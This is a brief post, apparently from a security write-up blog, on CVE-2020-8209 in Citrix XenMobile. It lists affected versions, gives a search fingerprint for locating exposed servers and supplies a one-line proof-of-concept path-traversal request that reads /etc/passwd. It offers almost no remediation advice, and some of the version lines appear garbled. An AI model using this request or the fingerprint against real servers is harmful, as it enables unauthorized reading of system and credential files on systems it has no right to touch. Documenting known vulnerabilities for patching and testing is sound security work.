Post

Citrix Xenmobile Arbitrary File Reading Cve 2020 8209

Citrix Xenmobile Arbitrary File Reading Cve 2020 8209

Citrix XenMobile arbitrary file reading CVE-2020-8209

Vulnerability Description

XenMobile is an enterprise mobility management software developed by Citrix.

Affect Version

XenMobile server 10.12 before RP2

XenMobile server 10.11 before RP4

XenMobile server 10.1010.9 before RP6

XenMobile server before RP5

Network surveying and mapping

title=”XenMobile”

Vulnerability reappears

Verify POC

1
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

img

This post is licensed under CC BY 4.0 by the author.